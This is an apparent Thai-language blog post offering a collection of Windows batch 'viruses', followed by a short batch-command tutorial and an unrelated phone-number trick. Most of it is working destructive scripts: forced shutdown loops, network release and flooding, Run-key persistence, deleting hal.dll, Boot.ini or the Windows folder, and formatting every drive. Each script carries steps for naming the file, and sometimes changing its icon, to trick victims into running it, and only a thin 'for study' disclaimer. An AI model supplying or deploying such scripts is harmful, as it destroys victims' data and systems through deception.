วันศุกร์ที่ 26 กุมภาพันธ์ พ.ศ. 2553

รวมวิธีสร้างไวรัส
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t 0

ถ้าจะสร้างไวรัสrestart

@echo off
TITLE Mr_Unlocker
shutdown -r -t 01

ถ้าจะสร้างไวรัสlogoff
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
********************************************************************************
************
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต


@echo off
TITLE Mr_Unlocker
ipconfig /release


วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

********************************************************************************
************
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง


@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH


วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

==============================

*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว

Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตได้อีก - -'


@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE


วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

=============================================

Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง 5 วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)


@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 5 >>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE



วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

Virus#6 Delete Windows


@echo off
@echo I''m YoYo I''ll hack your computer
@echo.
@del C:\w indows\system32\hal.dll
@shutdown -s
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

=============================================
Virus#7 สั่ง Format ทุกไดร์ฟ


@echo off
ping ***.***.***.***
format c:
y
format d:
y
format e:
y

shutdown -r -f -t 10

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ต้องทำเป็น .bat แล้วใช้ .batto.exe เปลี่ยนไอคอน เป็น ไอคอนต่างๆ
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
=============================================

Virus#8
Delete ทั้งวินโดวส์


@echo What's Up I'm Virus And I'll Hack your computer
@echo off
@del C:\windows
@shutdown -s
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ต้องทำเป็น .bat แล้วใช้ .batto.exe เปลี่ยนไอคอน เป็น ไอคอนต่างๆ
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

วันจันทร์ที่ 8 กุมภาพันธ์ พ.ศ. 2553

คำสั่ง bat และการเขียนไวรัส

ท่านสามารถสร้างไฟล์ bat,cmd ได้โดย Notepad คิดว่าคงทำเป็นกันนะ


คำสั่ง ไฟล์ bat,cmd



#คำสั่ง start คือคำสั่งรันไฟล์หรือโปรแกรมต่างๆ

เช่น start /min explorer D:\ คือการรันexplorer ในตำแหน่งD:\ โดยย่อหน้าต่าง(เปลี่ยนminเป็นmaxจะเป็นหน้าต่างเต็ม)

ถ้าเราจะรันไฟล์color.txt ให้ใส่ตำแหน่งโปรแกรมที่ใช้กับไฟล์ ตามด้วยตำแหน่งไฟล์

เช่น start %SystemRoot%\system32\notepad.exe E:\Project\bat\color.txt



#คำสั่ง color คือคำสั่งเปลี่ยนสีพื้นหลังและอักษรในCMDที่รันขึ้นมา

color [สีพื้นหลัง][สีอักษร] เช่น color f0 คือพื้นหลังสีขาว อักษรสีดำ

ระหัสสี

0 = Black 8 = Gray

1 = Blue 9 = Light Blue

2 = Green A = Light Green

3 = Aqua B = Light Aqua

4 = Red C = Light Red

5 = Purple D = Light Purple

6 = Yellow E = Light Yellow

7 = White F = Bright White



#คำสั่ง @echo off คือคำสั่งปิดการแสดงข้อความคำสั่ง(onคือแสดง)เช่น

echo Goo <--มันจะแสดงข้อความว่า echo Goo

แต่ถ้าใส่@echo off

@echo off

echo Goo <--มันจะแสดงข้อความว่า Goo



#คำสั่ง echo คือคำสั่งแสดงข้อความ เช่น

@echo off

echo. <--เว้นบรรทัด เหมือนการ Enter

echo Goo <--แสดงข้อความว่า Goo



#คำสั่ง แสดงวันที่และเวลา

echo %time% <--แสดงข้อความเวลาเป็น 22:16:23.70 (ชม:น:วิ.เสี่ยววิ)

echo %date% <--แสดงข้อความวันที่เป็น Fri 01/30/2009



#คำสั่ง goto คือคำสั่งกระโดดไปยังตำแหน่งที่ตั้งไว้ เช่น

@echo off

:loop <--ระบุชื่อตำแหน่งกระโดด

echo Oh...!

goto loop <--กระโดดไปยังตำแหน่งที่ระบุ



#คำสั่ง pause คือคำสั่งหยุดรอการตอบสนองจากผู้ใช้

เมื่อโปรแกรมดำเนินงานไปจนถึงคำสั้ง pausu จะหยุดและแสดงข้อความว่า "Press any key to continue...."

เมื่อเรากดปุ่มบนคีย์บอร์ดโปรแกรมจะทำงานต่อไป



#คำสั่ง exit คือคำสั่งปิดโปรแกรมทันทีแม้ว่าโปรแกรมยังรันคำสั่งไม่หมด(ปกติเมื่อรันคำสั่งบรรทัดสุดท้ายเสร็จCMDจะปิดไปเอง ยกเว้นคำสั่งgoto)



#คำสั่ง shutdown คือคำสั่ง ปิดเครื่อง,Restart,LogOff

ตัวอย่างคำสั่ง

shutdown -s -t10 -c"Turn Off" <--ปิดเครื่อง นับถอยหลัง10วินาที แสดงข้อความว่า Turn Off

shutdown -r -t77 -c"Restart in 77 seconds" <--รีสตาร์ทเครื่อง นับถอยหลัง77วินาที แสดงข้อความว่า Restart in 77 seconds

shutdown -l -t0 -c"Log Off Now!!" <--LogOff ทันที แสดงข้อความว่า Log Off Now!!

shutdown -m\\com1 -s <--ปิดเครื่องที่ชื่อcom2 ผ่าน Network



#คำสั่ง attrib คือคำสั่งจัดการรูปแบไฟล์

attrib +h C:\*.* <--กำหนดไฟล์ในไดร์Cทั้งหมด เป็นซ่อน ถ้า-h คือปิดการซ่อนไฟล์

attrib +s C:\*.* <--กำหนดไฟล์ในไดร์Cทั้งหมด เป็นไฟล์ระบบ ถ้า-s คือกำหนดเป็นไฟล์ธรรมดา

attrib +r C:\*.* <--กำหนดไฟล์ในไดร์Cทั้งหมด เป็นอ่านอย่างเดียว ถ้า-r คือปิดการอ่านอย่างเดียว



ไฟล์ระบบเราจะไม่สามารถมองเห็นได้แม้ว่าจะเปิดซ่อนในFolder Options

ซึ่งเป็นวิธีการซ่อนตัวอย่างดีของไวรัส



copy คำสั่ง คัดลอก

xcopy คำสั่ง คัดลอกเหมือนกัน แต่ฟังก์ชั่นมากกว่า (ปวดหัว)

del คำสั่ง ลบไฟล์



การศึกษาวิธีใช้คำสั่งเพิ่มเติม

เปิดCMDขึ้นมา แล้วพิมพ์คำสั่ง ตามด้วย /? เช่น

copy /? <--CMDจะแสดงวิธีใช้คำสั่งดังกล่าว

(ใช้ได้กับทุกคำสั่ง)



แถมV.... อันนี้เปรียบดั่งการฆ่าตัวตาย คือการลบไฟล์ Boot.ini(ธรรมดาเราจะมองไม่เห็นไฟล์นี้เพราะเป็นไฟล์ระบบ)

อาการปกติ แต่เมื่อเปิดครั้งต่อไป จะเข้าwindowsไม่ได้ เพราะเราลบทางเข้ามันซะแล้ว

ที่บอก เพราะไม่อยากให้ลอง

del C:\Boot.ini



ทั้งนี้และทั้งนั้น ผมคงเอาตัวอย่างไวรัสมาลงไว้ไม่ได้

แต่เมื่อท่านศึกษาคำสั่งCMDจนแตกฉาน ก็จะทำได้เอง [ผมเองก็ศึกษามากว่า2ปี]

การเขียนใวรัสอย่างง่าย

การเขียนไวรัสแบบง่าย
ห้ามนำไปสร้างความปวดหัวให้กับคนอื่น ขอให้เป็นแค่กรณีศึกษานะครับ
ไวรัส #1 กดแล้ว ปิดเครื่อง

ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น



Code: < เลือกทั้งหมด >

@echo off

TITLE Mr_Unlocker

shutdown -r -f -t0





วิธีทำ

1.เปิด Notepad ขึ้นมา

2.ก็อปโค้ดดังกล่าวลงไปวาง

3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)

***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***





ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก

อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต



Code: < เลือกทั้งหมด >

@echo off

TITLE Mr_Unlocker

ipconfig /release





วิธีทำ

1.เปิด Notepad ขึ้นมา

2.ก็อปโค้ดดังกล่าวลงไปวาง

3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)

***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***



Virus#3 Combo Virus

ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง



Code: < เลือกทั้งหมด >

@echo off

TITLE Mr_Unlocker :CRASH

net send * WORKGROUP ENABLED

net send * WORKGROUP ENABLED

GOTO CRASH





วิธีทำ

1.เปิด Notepad ขึ้นมา

2.ก็อปโค้ดดังกล่าวลงไปวาง

3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)

***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***



==============================



*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว



Virus#4 Disble IP Address

โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตได้อีก - -'



Code: < เลือกทั้งหมด > < ย่อ >

@echo off

break off

TITLE Unlocker Hackers

echo @echo off>c:\windows\wimn32.bat

echo break off>>c:\windows\wimn32.bat

echo ipconfig/release_all>>c:\windows\wimn32.bat

echo end>>c:\windows\wimn32.bat

reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f

reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f

echo Unlocker Hackers Strike Again

PAUSE





วิธีทำ

1.เปิด Notepad ขึ้นมา

2.ก็อปโค้ดดังกล่าวลงไปวาง

3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)

***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***



=============================================



Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)



Code: < เลือกทั้งหมด > < ย่อ >

@echo off

break off

TITLE Unlocker Hackers

echo @echo off>c:\windows\hartlell.bat

echo break off>>c:\windows\hartlell.bat

echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat

echo end>>c:\windows\hartlell.bat

reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f

reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f

echo Unlocker Hackers Strike Again

PAUSE

วิธีทำ

1.เปิด Notepad ขึ้นมา

2.ก็อปโค้ดดังกล่าวลงไปวาง

3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)

***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

การคำนวนเบอร์โทรศัพท์ คิดได้ไงลองดูนะ

ทิปแก้เครียด ลองทำตามนะคับพี่น้อง เริ่มต้น เอาเลขของเบอร์โทร 3 ตัวแรก คูณด้วย 80 แล้วบวกด้วย 1 จากนั้นนำไปคูณด้วย 250 เสณ้จแล้วบวกด้วย 4 ตัวหลังของเบอร์โทร 2 ครั้ง แล้วนำไปลบด้วย 250 สุดท้ายนำไปหารด้วย 2 ผลลัพธ์ที่ได้ ก็จะเป็นเบอร์มือของเรา ฮิฮิ นุกหนาน  ก๊อปเขามาอีกที